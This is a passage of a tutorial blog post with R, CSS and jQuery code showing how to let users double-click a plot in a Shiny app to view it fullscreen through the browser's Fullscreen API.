&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expand &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expansion&lt;/span&gt;(mult &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.025&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;mono&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid.minor.x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid.minor.y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;salesPlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;createPlot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;sales&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of sales\n&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;volumePlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;createPlot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;volume&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Total value of sales\n(millions)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;medianPlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;createPlot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;median&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Median sale price\n(thousands)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;listingsPlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;createPlot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;listings&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Total active listings\n&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;details&gt;&lt;summary&gt;&lt;code&gt;shinyApp&lt;/code&gt; call&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui, server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;The accompanying CSS file is very short:&lt;/p&gt;
&lt;details open&gt;&lt;summary&gt;www/style.css&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-css" data-lang="css"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;h2&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-top&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;plot-container&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;height&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;190&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;cursor&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;pointer&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;padding-top&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-bottom&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;plot-container&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fullscreen&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;cursor&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;default&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;plot-container&lt;/span&gt;:&lt;span style="color:#d2a8ff;font-weight:bold"&gt;last-child&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-bottom&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;Open this app in a desktop browser and you should see something like this:&lt;/p&gt;
&lt;img src="assets/main.jpg" srcset="assets/main@2x.jpg 2x" alt="Screenshot of the toy Shiny application on page load in the desktop version of Chrome" style="max-width: 750px; display: block; margin-left: auto; margin-right: auto" /&gt;
&lt;p&gt;One thing of note from the &lt;code&gt;ui&lt;/code&gt; function: I set the heights of the plots to be 100% of their containers:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;div&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;salesPlot&amp;#34;&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;plot-container&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;tabindex&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The heights of the containers themselves were then set in the CSS file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-css" data-lang="css"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;plot-container&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;height&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;190&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;cursor&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;pointer&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;padding-top&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;margin-bottom&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;From the above R-code snippet you will also see that I gave the containers a tabindex value of &amp;ldquo;0&amp;rdquo;. I&amp;rsquo;ll explain why later.&lt;/p&gt;
&lt;aside&gt;
&lt;h3 id="aside-ugly-hacks"&gt;Aside: ugly hacks&lt;/h3&gt;
&lt;p&gt;Notice that the four plots are all created as separate images, not as a single matrix. This is so that they can separately be fullscreened, as we&amp;rsquo;ll see shortly. However, because the charts are independent of each other and the y axes have different units and labels, out of the box the horizontal axes did not line up. To get around these issues I implemented a few hacks in the &lt;code&gt;server&lt;/code&gt; function. There are probably better solutions out there, but I:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;(pre-)padded the y-axis labels with whitespace so all labels had the same number of characters,&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;formatLabels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(label) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_pad&lt;/span&gt;(label, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, pad &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34; &amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;set the axis-label font to &amp;ldquo;mono&amp;rdquo; so all the equal-length labels took up the same space,&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axis.text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;mono&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;added a newline character at the end of the shorter y-axis labels so that they took up two lines of space like the longer y-axis labels.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;salesPlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;createPlot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;sales&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of sales\n&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/aside&gt;
&lt;h2 id="the-basic-javascript"&gt;The Basic JavaScript&lt;/h2&gt;
&lt;p&gt;While it&amp;rsquo;s perfectly possible to use the fullscreen API with only &lt;a href="https://stackoverflow.com/a/20435744" rel="external"&gt;vanilla JavaScript&lt;/a&gt;, Shiny already adds &lt;a href="https://jquery.com/" rel="external"&gt;jQuery&lt;/a&gt; to the page (aliased as &lt;code&gt;$&lt;/code&gt;) so we&amp;rsquo;ll use it for convenience and brevity. We&amp;rsquo;ll begin by using the &lt;code&gt;ready&lt;/code&gt; method to ensure the code inside the supplied function isn&amp;rsquo;t run until the page has loaded and our plot containers are a part of it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$(&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;use strict&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Interesting code goes here
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first thing we can do is check if the fullscreen API is actually supported. If it&amp;rsquo;s not we can give up straight away.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;document.fullscreenEnabled) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we&amp;rsquo;ll add a helper function to check whether fullscreen mode is already in action:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; isFullscreen() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;!!&lt;/span&gt;document.fullscreenElement;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This function is very simple and isn&amp;rsquo;t necessary, but (I think) it does make the later code we&amp;rsquo;ll see a little easier to read.&lt;/p&gt;
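&lt;p&gt;As a rough sketch, the two checks so far can be bundled into one small function. Both only read properties of &lt;code&gt;document&lt;/code&gt;, so the function below takes a document-like object as an argument, which also lets it run outside a browser. The names &lt;code&gt;fullscreenStatus&lt;/code&gt; and &lt;code&gt;fakeDocument&lt;/code&gt; are made up for this illustration and are not part of the app:&lt;/p&gt;

```javascript
// Hypothetical helper: `doc` is anything shaped like the browser's `document`.
function fullscreenStatus(doc) {
  return {
    // true when the browser allows fullscreen requests on this page
    supported: Boolean(doc.fullscreenEnabled),
    // true when some element is currently displayed fullscreen
    active: Boolean(doc.fullscreenElement)
  };
}

// A stand-in object (an assumption for the demo), so the sketch runs anywhere
const fakeDocument = { fullscreenEnabled: true, fullscreenElement: null };
console.log(fullscreenStatus(fakeDocument));
```

&lt;p&gt;In the browser you would pass the real &lt;code&gt;document&lt;/code&gt; instead of the stand-in object.&lt;/p&gt;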
&lt;p&gt;Now let&amp;rsquo;s use jQuery again to grab our plot containers:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; $plotContainers &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; $(&lt;span style="color:#a5d6ff"&gt;&amp;#39;.plot-container&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and add a very simple event handler to them for when they are double-clicked on:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$plotContainers.on(&lt;span style="color:#a5d6ff"&gt;&amp;#39;dblclick&amp;#39;&lt;/span&gt;, &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (isFullscreen()) { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.requestFullscreen();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first line of the body checks we&amp;rsquo;re not already in fullscreen. The second line uses the special &lt;code&gt;this&lt;/code&gt; variable. Inside jQuery event handlers, &lt;code&gt;this&lt;/code&gt; refers to the specific document element on which the event listener was triggered so all we need to do with it is &lt;code&gt;requestFullscreen&lt;/code&gt;. And that&amp;rsquo;s it! Double-click on/near a plot and it will go fullscreen and look something like this:&lt;/p&gt;
&lt;img src="assets/fullscreen.jpg" srcset="assets/fullscreen@2x.jpg 2x" alt="Screenshot of the toy Shiny application with one plot made fullscreen" style="max-width: 750px; display: block; margin-left: auto; margin-right: auto" /&gt;
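&lt;p&gt;One caveat worth sketching: in current browsers &lt;code&gt;requestFullscreen&lt;/code&gt; returns a promise, and the browser may refuse the request (for example, when it was not triggered by a user action). The handler above ignores that case, which is fine for a toy app. If you wanted to handle a refusal, a wrapper along these lines might do; &lt;code&gt;tryFullscreen&lt;/code&gt; is a hypothetical name, not something from jQuery or Shiny:&lt;/p&gt;

```javascript
// Hypothetical wrapper: resolves to true on success and false on refusal.
function tryFullscreen(element) {
  // Starting from a resolved promise also copes with older browsers
  // whose requestFullscreen() returns undefined rather than a promise.
  return Promise.resolve()
    .then(function () { return element.requestFullscreen(); })
    .then(function () { return true; })
    .catch(function (error) {
      console.warn("Fullscreen request was refused:", error.message);
      return false;
    });
}
```

&lt;p&gt;Inside the double-click handler, &lt;code&gt;this.requestFullscreen()&lt;/code&gt; would then become &lt;code&gt;tryFullscreen(this)&lt;/code&gt;.&lt;/p&gt;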
&lt;p&gt;You&amp;rsquo;ll see &amp;mdash; if you try this for yourself &amp;mdash; that not only does the container resize, the plot does shortly after. &lt;em&gt;I&lt;/em&gt; didn&amp;rsquo;t have to write any JavaScript to make the latter trick happen. The only thing I had to do was, as mentioned earlier, set the plots to be 100% the height of their container (the width already is by default) in the R code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plotOutput(&lt;span style="color:#a5d6ff"&gt;&amp;#34;salesPlot&amp;#34;&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When the browser puts the plot container into fullscreen it forces that element to be 100% wide and tall (superseding the &amp;ldquo;190px&amp;rdquo; value I set in the CSS). After that happens, the Shiny JavaScript code magically (I&amp;rsquo;m 90% sure it&amp;rsquo;s not actually magic) notices the image is too small and requests a new, bigger, one from the server.&lt;/p&gt;
&lt;p&gt;There&amp;rsquo;s one other tiny little tweak that&amp;rsquo;s worth mentioning. The CSS sets the cursor style to &lt;code&gt;pointer&lt;/code&gt; for the plot containers (hoping to remind an informed user the plot can be blown up if double-clicked). The following rule makes use of the &lt;code&gt;:fullscreen&lt;/code&gt; pseudo-class to unset it again when double-clicking no longer has an effect:&lt;/p&gt;
